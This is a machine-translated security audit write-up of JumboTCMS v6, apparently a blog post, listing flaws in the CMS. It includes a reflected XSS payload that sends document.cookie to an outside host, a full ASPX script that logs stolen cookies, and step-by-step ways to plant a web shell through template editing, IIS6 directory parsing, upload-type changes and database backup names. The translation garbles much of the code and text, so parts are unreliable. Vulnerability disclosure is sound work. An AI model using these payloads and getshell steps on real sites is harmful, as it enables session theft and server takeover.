Summarize the Audit Summary of Bo CMS (JumboTCMS) _ V6 code

Author. NET open-source CMS for fun, Baidu went down, saw the Blog CMS, the popularity is quite high, go to the official website to download the latest version of 6.0, NND, installation can not be installed, anyway, there are errors... I really don't know whether the official team is deliberate or not... So it took two days to debug the program and finally run it... The database data is inserted manually... Potholes... Program functions cannot be seen, but the code is very slow, and many things are not nice... Forget it, just watch it... I was the first to come into contact with this program.

I was looking for something to inject csrf or something. I read the code and did not find anything to use. Personal technical problems.

1. No prompt or automatic deletion of the installation file after installation

After the installation is complete, no prompt is prompted or the install directory file is automatically deleted,

Visit http://seay.sinaapp.com/install/default.aspxto directly reinstall the installation program,

 

Ii. Cookie-saving user name and password

There are a lot of cookies,

 

Id = 2 & name = ss123 & nickname = ss123 & password = e10adc3949ba59abbe56e057f20f883e & email = 1160549384% 40qq.com & groupid = 1 & groupname = % e4 % b8 % b4 % e6 % 97% b6 % e7 % 94% a8 % e6 % 88% b7 & setting = 1% 2c1% 2c1% 2c0% 7c23% 2c1% 2c10% 2c10% 2c1% 2c0% 2c1% 2c1% 2c5% 2c1% 2c1% 2c5% 2c1% 2c1% 2c5% 2c & cookies = c42071141

 

The password is saved in it.

 

Iii. Statistics plug-in XSS vulnerabilities:

First look at the Code:

 

String _ channeltype = q ("cType ");

Get the value, and then assign it to _ viewnum. then convert it to javascript output... Direct XSS,

Verify

Http://seay.sinaapp.com//plus/viewcount.aspx? Ccid = 13 & cType = article <script> alert (/1/) </script)

Cookie Retrieval

Http://seay.sinaapp.com/plus/viewcount.aspx? Ccid = 13 & cType = article <script> document. location = 'http://seay.sinaapp.com/1.aspx? Id = '+ document. cookie </script>

 

By the way, An aspx is written to receive the cookice value.

<% @ Page Language = "C #" AutoEventWireup = "true" %>

<Head id = "Head1" runat = "server">

<% @ Import Namespace = "System. IO" %>

<Script language = "C #" runat = "server">

Protected void Page_Load (object sender, EventArgs e)

{

String str = Request ["id"];

Str = System. Web. HttpUtility. UrlDecode (str );

StreamWriter sw = null;

String path = Server. MapPath ("~ /") + Eclipseay.txt ";

Sw = new StreamWriter (path, true, new UTF8Encoding ());

Sw. Write ("---- Cookie value:" + str + "---- \ n \ B ");

Sw. Close ();

Response. Redirect ("http://www.baidu.com /");

}

</Script>

</Head>

Save it as aspx. You can decrypt the password after you get it,

 

 

Background GetShell method:

4. Edit the template to capture and change the package to generate a shell;

After entering the background, we can see that the foreground updates this,

 

Choose public header file-edit template,

 

The file name is the ID read from the database, so the Arbitrary File Read vulnerability is avoided,

Modify the template content to a prepared sentence (back up the original template first, remember to change it back), use live http headerplug-in to capture packets, modify header.htm in the submitted address to header. aspx, and then Replay the submitted content.

Header. aspx, shell address http://www.2cto.com generated under the http://seay.sinaapp.com/templates/default/include/header.aspx/templates/default/include/directory

 

 

5. Directory creation is not filtered;

First look at the source code:

 

Directory. Exists () check whether the folder Exists.

 

If no filter is selected, the system generates the file directly. In the test,

Backend-system management-channel management. Now we add the channel, the previous figure

 

For IIS6.0, the directory name is not filtered when the directory is created. We will write the actual directory of the channel to seay. aspx and use IIS to parse getshell. You know.

Now, we have a directory named a. aspx in the root directory.

 

6. Modify the upload file type;

Next, you can modify the allowed upload type in the channel and content model areas.

 

You can directly write the upload type such as aspx...

 

7. Custom file names of the egg backup database;

Let's look at the source code first:

This is from MSSQL,

The semicolon (;) and 'are clearly filtered out. It seems that programmers know about IIS parsing,

 

But check the ACCESS

 

No filtering... I don't know what to think.

When we leave a message or something, we can write a sentence where something can be written,

Switch to System Management-database maintenance and directly change the backup file name to seay. aspx ;. if the bak name is not the bak extension, it will automatically add. bak, backup path _ data \ databackup \ seay. aspx ;. bak

 

8. Online SQL Execution

Under system management, we can see that there is an "SQL statement executed online" without filtering SQL commands,

If the permission is good, it can be used to escalate the permission.

Forget it... Write it here. It hurts a lot... You cannot install many things and cannot verify them...

Keywords: Powered by JumbotCms